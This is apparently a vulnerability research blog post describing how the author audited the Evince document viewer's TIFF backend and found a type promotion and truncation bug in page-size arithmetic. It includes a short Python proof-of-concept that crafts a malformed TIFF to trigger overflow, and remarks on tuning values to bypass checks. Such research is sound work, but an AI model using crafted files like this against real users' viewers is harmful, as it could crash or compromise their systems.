Evince Integer Overflow and Truncation Due to Type Promotion in TIFF Backend

Posted on Thu 01 August 2024 in Thought, vulnerability research and discovery

I have been pretty fascinated with type promotion bugs in recent months. Why? Because I love it when code does arithmetic on some crazy mix of data types. Something about math (in)correctly implemented always makes me geek out. For those not familiar with type promotion, it's when a value of one data type is implicitly converted to another, usually a smaller type widened to a bigger one, and the trouble tends to start when the result is converted back.

One way to picture a type promotion going wrong is taking a dozen eggs in an egg carton and trying to fit all twelve into a half-dozen carton. The results are undesired and messy. In software development this can lead to overflow bugs and loss of precision in critical programs.
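To make the egg carton concrete, here is a minimal sketch using Python's ctypes module to mimic fixed-width C integers. The helper name store_as is my own for illustration. It only shows the general idea of a value not fitting its container, not anything specific to Evince.

```python
import ctypes

def store_as(ctype, value):
    """Store a Python int in a fixed-width C integer and read it back."""
    # ctypes does no overflow checking, so out-of-range values wrap around.
    return ctype(value).value

widened = store_as(ctypes.c_uint32, 200)    # small value, big carton: fits
wrapped_u8 = store_as(ctypes.c_uint8, 300)  # 300 does not fit in 8 bits
wrapped_i8 = store_as(ctypes.c_int8, 200)   # 200 does not fit in a signed 8 bits

print(widened, wrapped_u8, wrapped_i8)  # prints: 200 44 -56
```

The value 300 comes back as 44 (300 mod 256) and 200 comes back as -56. Nothing crashes, which is exactly why these bugs are easy to miss.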

So it was only natural for me to audit more code in the hope of finding more of them. The research below was done for fun back in May 2024. What I found is that you typically have a good chance of finding type promotion bugs in code bases that:

  • Do file parsing
  • Do image parsing
  • Do almost any arithmetic that looks funny and assign the result back to an already declared variable
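A crude text filter is one way to hunt for that last bullet. The sketch below is my own heuristic, not a real static analyzer: it flags lines where a variable is multiplied or divided and the result is assigned back to the same variable. The function name, the regular expressions and most of the sample input are made up for illustration. Only the h = h * (x_res / y_res); line is taken from the audit later in this post.

```python
import re

# Heuristic only: `x = x * ...` / `x = x / ...`, and compound `x *= ...` / `x /= ...`.
SELF_ASSIGN = re.compile(r"^\s*(\w+)\s*=\s*\1\s*[*/]")
COMPOUND = re.compile(r"^\s*\w+\s*[*/]=")

def suspicious_lines(source):
    """Return (line_number, text) pairs for lines worth a closer manual look."""
    hits = []
    for number, line in enumerate(source.splitlines(), start=1):
        if SELF_ASSIGN.search(line) or COMPOUND.search(line):
            hits.append((number, line.strip()))
    return hits

# Illustrative C-like input, not a quote from any real file.
sample = """\
guint32 h;
gfloat ratio;
h = h * (x_res / y_res);
scale *= 2.5;
total = count + 1;
"""

hits = suspicious_lines(sample)
for number, text in hits:
    print(number, text)
```

It knows nothing about types, so every hit still needs a human to check whether the operands are actually mixed.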

A couple of other reasons for going down this path were to get better at spotting these bugs and to catalogue my methodology. I find there is tons of content on "I found a vulnerability, let's exploit it" versus "How I approached auditing code like a developer to trigger a bug which may have security impact". While the latter title clearly doesn't capture the hype train, it does carry weight: understanding more of what a code base is doing can lead to a bigger impact.

Choosing Evince

I wanted to focus on something that ships by default with my virtual machine (VM) installation, mainly because users rarely change much about the defaults after installing, which means whatever I find should "just work".

My default VM is a vanilla Debian install (hostnamectl output below):

Operating System: Debian GNU/Linux 12 (bookworm)

Kernel: Linux 6.1.0-20-arm64

Architecture: arm64

A few other criteria for finding security-impacting bugs were:

  • Ideally from "Apps for GNOME", since the software is open source and somewhat documented
  • Smaller code base, for easier application comprehension and bug identification
  • "Easy" to document for bug submission, either to the project or to a bug bounty program

After narrowing my potential candidates down based on criteria, I landed on Evince.

Evince Comprehension

Instead of diving straight into the code, it's important to understand a bit about what Evince is and how it works. There are several ways to go about that research, but I started with the below:

Define Evince's application purpose

  • Document viewer for multiple document formats
  • Original goal was to replace the viewers that existed on the GNOME desktop
  • Nuggets from the old wiki were useful for understanding the original goals

A newer, more general description can be found here:

A document viewer for the GNOME desktop. You can view, search or annotate documents in many different formats.

Evince supports documents in: PDF, PS, EPS, XPS, DjVu, TIFF, DVI (with SyncTeX), and Comic Books archives (CBR, CBT, CBZ, CB7).

As you can see, Evince supports several file formats, which also piqued my interest. Some of the listed formats have had, and continue to have, security issues in other document readers when it comes to file or image parsing.

Evince has several ways of being invoked:

  • evince
  • evince-previewer
  • evince-thumbnailer

Those commands are of interest because of how the code base is laid out. More on that later.

The Research

Now that we know some general information, it's best to start with some knowns about Evince, such as the installed version, the most recent published version, and publicly known vulnerabilities. So I gathered information on the Evince version installed on the VM:

evince --version
GNOME Document Viewer 43.1

Identifying the Evince project page and code repository helped with direction and with understanding the code and application.

I also searched their GitLab issues for previously reported bugs and vulnerabilities, and ended up finding some pretty interesting ones from a while back:

What I find cool when looking at previous issues:

  • Buggy lines of code identified
  • Full stack trace
  • Tools for finding memory management issues, such as valgrind
  • POC or files used to trigger the bug
  • Mitigated lines of code or patches

The below command injection vulnerability was also neat:

In fact, I believe there is similar code in the DVI backend, except it is not vulnerable because g_shell_quote() is used on the filename. But who knows how far back that change was implemented...

DVI command execution code

Last but not least a fuzzed test case:

I found a few more bugs (Google searches and CVE databases), but I think you as the reader get the picture: research your target application to understand its usage and previously known vulnerabilities.

The codebase

Now it's time to look at the codebase to try and understand:

  • How the code is laid out, i.e. subsystems and components
  • How the developers intend the code to be configured, compiled, run, and contributed to

Once I feel comfortable with the two above, I can start doing some manual code auditing.

Code Layout

Below is a snippet of code layout:

backend/
build-aux/
cut-n-paste/
data/
help/
libdocument/
libmisc/
libview/
po/
previewer/
properties/
shell/
subprojects/
thumbnailer/
.gitlab-ci.yml
AUTHORS
ChangeLog.pre-git
CONTRIBUTING.md
evince-document.h
evince-view.h
MAINTAINERS
meson_options.txt
meson.build
NEWS
NEWS-security.md
NOTES
README.md
TODO

Below are the folders I considered subsystems as they are functionally different parts of the Evince application.

  • backend/
  • build-aux/
  • cut-n-paste/
  • libdocument/
  • libmisc/
  • libview/
  • previewer/
  • properties/
  • shell/
  • subprojects/
  • thumbnailer/

If you recall, I stated earlier that there were three ways to invoke Evince. You can see that the previewer and thumbnailer folders exist; they hold the code behind evince-previewer and evince-thumbnailer respectively.

The backend/ directory covers the document formats Evince supports, which I'll consider sub-subsystems:

  • backend/comics
  • backend/djvu
  • backend/dvi
  • backend/pdf
  • backend/ps
  • backend/tiff
  • backend/xps

The other files I mention below are worth looking into because they typically describe what changed in a release, security issues, how to configure and compile the application, or general notes and resources worth having at the beginning of the audit.

I highly recommend reading these files:

  • meson_options.txt
  • meson.build
  • NEWS
  • NEWS-security.md
  • NOTES
  • README.md
  • TODO

As stated earlier, I am mostly interested in the backend subsystems, as they deal with document handling. I went through several of the sub-subsystems in the backend directory and found some bugs (which I recommend others investigate), but I am only going to talk about backend/tiff from here on out.

Backend/tiff audit

There are 7 files in the TIFF backend, but I am only interested in the C files and the headers.

tiff-document.c is where we start to explore the code in some depth. I should mention that I took a bit of a refresher first, reviewing some K&R and my notes on The Art of Software Security Assessment (TAOSS), particularly Chapter 5 (Type conversion + Type Conversion Vulnerabilities) of TAOSS. This helped me immensely to get up to speed.

When looking through code, developers sometimes leave notes for themselves or future developers. It might help to scan for things like "FIXME", "TODO", etc., which could give away some tips on bugs. This didn't yield much on my initial pass, so I decided to audit line by line. It was really the only way to understand what the code's purpose was.

After the first quick scan of the functions, I distilled the purpose of the code down to essentially handling Tag Image File Format (TIFF) documents.
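The marker scan is easy to script. Below is a minimal sketch, assuming a local checkout with C sources under some directory. The function name find_markers, the extra "XXX" and "HACK" markers, and the backend/tiff path in the usage lines are my own choices for illustration.

```python
import os
import re

# "FIXME" and "TODO" come from the text above; "XXX" and "HACK" are extra guesses.
MARKERS = re.compile(r"\b(FIXME|TODO|XXX|HACK)\b")

def find_markers(root, extensions=(".c", ".h")):
    """Yield (path, line_number, text) for each marker found under root."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in sorted(filenames):
            if not name.endswith(extensions):
                continue
            path = os.path.join(dirpath, name)
            # errors="replace" keeps the scan going on oddly encoded files.
            with open(path, encoding="utf-8", errors="replace") as handle:
                for number, line in enumerate(handle, start=1):
                    if MARKERS.search(line):
                        yield path, number, line.strip()

if __name__ == "__main__":
    # Hypothetical path: adjust to wherever the source tree is checked out.
    for path, number, text in find_markers("backend/tiff"):
        print(f"{path}:{number}: {text}")
```

A plain grep does the same job; the script form is just easier to extend, for example to sort hits by file or to skip vendored directories.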

In simple terms: TIFF is a format used to save really detailed pictures that need to look good, even when zoomed in or printed out. TIFF files can store a lot of detail in the image, making them great for printing and editing, but because of that, they can also be pretty big in size.

tiff-document.c functions that I thought were worth noting:

What I liked about these functions was that:

  • They deal with document size/resolution
  • User controlled input (potential attack vector on a component)
  • Ripe for TIFF document manipulation 😈

Starting with tiff_document_get_resolution()

tiff_document_get_resolution()

Key highlights:

  • 4 gfloat variables (2 declared and initialized & 2 declared in the function arguments)
  • 1 gushort declared and uninitialized

Two of the variables, X and Y, can be controlled by the user when generating a TIFF document. TIFFGetField attempts to get the values of X and Y before any conversion is done, and execution then continues to the bottom block of code, which handles the 0-value edge case. While this function doesn't yield the desired bug, it does get me familiar with the values I should see throughout the code for manipulating resolution, checking the resolution size and so forth.
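As a rough model of that flow, here is a Python sketch of the logic as I described it: read X and Y, optionally convert units, then fall back when a value is 0. This is not the Evince source. The tags dictionary, the function name get_resolution, the centimetre-to-inch conversion and the 72.0 fallback are all assumptions made for illustration. The resolution unit codes are the ones defined by the TIFF 6.0 specification.

```python
RESUNIT_INCH = 2        # TIFF 6.0 ResolutionUnit codes
RESUNIT_CENTIMETER = 3

def get_resolution(tags, fallback=72.0):
    """Return (x_res, y_res) from a dict of TIFF tags, never 0 or negative."""
    x = float(tags.get("XResolution", 0.0))
    y = float(tags.get("YResolution", 0.0))

    # Assumed conversion step: normalise centimetre-based values to inches.
    if "XResolution" in tags and "YResolution" in tags:
        if tags.get("ResolutionUnit", RESUNIT_INCH) == RESUNIT_CENTIMETER:
            x *= 2.54
            y *= 2.54

    # The 0-value edge case: replace unusable values with a fallback (assumed 72.0).
    x_res = x if x > 0 else fallback
    y_res = y if y > 0 else fallback
    return x_res, y_res

print(get_resolution({"XResolution": 0, "YResolution": 0}))
print(get_resolution({"XResolution": 300, "YResolution": 150}))
```

Note what the edge-case handling does and does not cover in this model: it rejects 0, but it puts no upper bound on either value or on the ratio between them.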

Moving to tiff_document_get_page_size() is where things start to get a bit interesting.

tiff_document_get_page_size - 1

tiff_document_get_page_size - 2

If you are reviewing closely, we now have some arithmetic being performed on mixed data types.

  • w and h are guint32 (unsigned 32-bit integers)
  • x_res and y_res are gfloat (32-bit floating-point numbers)

The arithmetic operation being performed is:

 h = h * (x_res / y_res); 

So what is happening?

Let's walk through this.

  • x_res / y_res
    • Both x_res and y_res are gfloat, so this division operation results in a gfloat.
  • h * (x_res / y_res)
    • h is a guint32, which is an integer. However, because it’s being multiplied by a gfloat, the h value is promoted to a gfloat for the multiplication.

The Type Promotion

  • The value of h (originally a guint32) is implicitly converted to a gfloat for the multiplication with (x_res / y_res): under C's usual arithmetic conversions, when one operand is a float the integer operand is converted to float as well.
  • After the multiplication, the result is a floating-point number (gfloat).
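The promotion step is lossy on its own, before any truncation happens. A 32-bit float has a 24-bit significand, so not every 32-bit integer survives the trip. The sketch below emulates that with ctypes.c_float; the helper name to_float32 is mine.

```python
import ctypes

def to_float32(value):
    """Round a number to the nearest 32-bit float, as a C conversion to float would."""
    return ctypes.c_float(float(value)).value

exact = to_float32(16_777_216)    # 2**24: representable exactly
rounded = to_float32(16_777_217)  # 2**24 + 1: not representable, gets rounded

print(exact, rounded)  # prints: 16777216.0 16777216.0
```

Above 2**24 the float can no longer tell neighbouring integers apart, so a large enough h changes value just by taking part in the multiplication.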

But, Truncation?

  • The result of the multiplication, which is a gfloat, is then assigned back to h, which is a guint32.
  • This assignment truncates the floating-point result back to an integer.
  • Any fractional part is lost, and if the result is too large to fit in a guint32 the conversion is undefined behavior in C, which could lead to a loss of precision or a crash 😈😈😈

So now we have a type promotion bug combined with a truncation issue. I shouldn't have to say it, but if you are leveraging floats for precision, know that mixed data types will haunt you until you handle them with care.
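Here is a small model of h = h * (x_res / y_res); that walks through both steps. It is a sketch that emulates 32-bit floats with ctypes, not the Evince code, and the helper names and input values are illustrative. One fact worth keeping in mind: in C, converting a float to an integer type that cannot hold the truncated value is undefined behavior, so the sketch reports that case instead of pretending to know the result.

```python
import ctypes
import math

def f32(value):
    """Round to the nearest 32-bit float."""
    return ctypes.c_float(float(value)).value

def scaled_height(h, x_res, y_res):
    """Emulate h * (x_res / y_res) evaluated in 32-bit floats (y_res must be > 0)."""
    ratio = f32(f32(x_res) / f32(y_res))
    return f32(f32(h) * ratio)

def describe(h, x_res, y_res):
    """Return (float_product, stored_value); stored_value is None when the
    conversion back to a 32-bit unsigned integer would be out of range."""
    product = scaled_height(h, x_res, y_res)
    if not math.isfinite(product) or not (-1 < product < 2**32):
        return product, None       # undefined behavior in C
    return product, int(product)   # int() truncates toward zero, like C

print(describe(21000, 300.0, 150.0))  # ratio 2.0: nothing lost
print(describe(1001, 72.0, 144.0))    # ratio 0.5: the .5 is dropped
print(describe(21000, 4.0e9, 1.0))    # far beyond what 32 bits can hold
```

The first two calls show ordinary truncation. The third is the interesting one: once the ratio is attacker-influenced, the product can leave the guint32 range entirely.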

So What?

Well, now that we've found the bug, it needs to be triggered to see if it can lead to undefined behavior. That means writing code or leveraging the application's normal usage to reach tiff_document_get_page_size, since it's our initial attack vector. If you've been following along, you will notice I mentioned tiff_document_render() as the other interesting function. That is because it will help trigger our potentially vulnerable path.

Identifying a bug is only part of the equation. If you plan on helping patch the code, writing a bug report, attempting to exploit the bug, etc., you are going to need to be able to reproduce it and communicate it clearly to your audience.

Luckily, we spent time understanding the application's purpose and usage earlier, so triggering the bug shouldn't be a problem, right? right?

right right

The POC

Well, there are a couple of different ways you can approach generating a TIFF file for Evince to read, but I went the simple route: Python and the Python Imaging Library fork, Pillow.

#!/usr/bin/env python
# jay@stellersjay.pub
# X: https://x.com/call_eax
# Mastodon: https://infosec.exchange/@calleax
from PIL import Image
import numpy as np

# Define the page size in pixels (width, height)
# Slightly increased dimensions to push closer to overflow conditions
page_width = 16384  # Incremented slightly to push closer to limit
page_height = 21000  # Incremented slightly

# Create a new image with the specified size and mode
image = Image.new('RGB', (page_width, page_height), color=(255, 255, 255))

# Define resolutions to trigger type promotion bug
# Fine-tune the resolution values for maximum effect without causing immediate failure
x_res = np.finfo(np.float32).max / 19000  # Slightly less extreme than before
y_res = 0.1 # Slightly decreased to increase the ratio

# Save the image as a TIFF file with these new settings
image.save('crafted_output.tiff', format='TIFF', dpi=(x_res, y_res))

print("Optimized TIFF file created successfully with dimensions:", (page_width, page_height), "and resolution:", (x_res, y_res))

I also added the proof of concept and associated files to GitHub. When running the POC, it might be useful to monitor system logs (journalctl or similar), and maybe install systemd-coredump. I won't go into details in this post, but system logs can be highly effective for bug hunting.

If you are looking at system debug logs or at a debugger (I'll cover this in another post, with Cairo as an example), you will notice output like the below, which comes from the tiff_document_render() function.

overflow warnings

Above is the warning, and below is the line of code (LOC) where it tells you it's overflowing.

overflow in function code

If you play with the values of page_width and page_height and fine-tune x_res and y_res, you can potentially bypass the overflow checks, which might get you a different set of undefined behaviors like the below.

fine-tune resolution

Fine-tune resolution results.

Wrapping it up...for now

While this post focused on the identification of type promotion bugs in the TIFF backend of Evince, there’s a lot more that I didn’t get to cover this time around. Topics like reverse engineering the binary application, leveraging built-in system and developer tools to identify unsafe code and memory leaks are critical to a thorough audit. As mentioned earlier, I'll be diving into these in a future post, where I'll highlight how these techniques can uncover even more subtle vulnerabilities.

Type promotion bugs like the one we explored in the TIFF backend of Evince are a subtle reminder of the complexity and fragility of software systems. Finding and understanding these bugs requires not just a deep dive into the code, as a developer would, but also a thoughtful approach to how different data types interact within a program.

The chronicle doesn't end here—there's still plenty of ground to cover, especially when it comes to triggering and exploiting these vulnerabilities in a controlled environment (or sending as a payload). In future posts, I'll dive deeper into methods for exploiting such bugs, as well as exploring other fascinating aspects of vulnerability research.

If you're interested in this type of research, or if you have any questions, feel free to reach out—I’d love to hear your thoughts and experiences.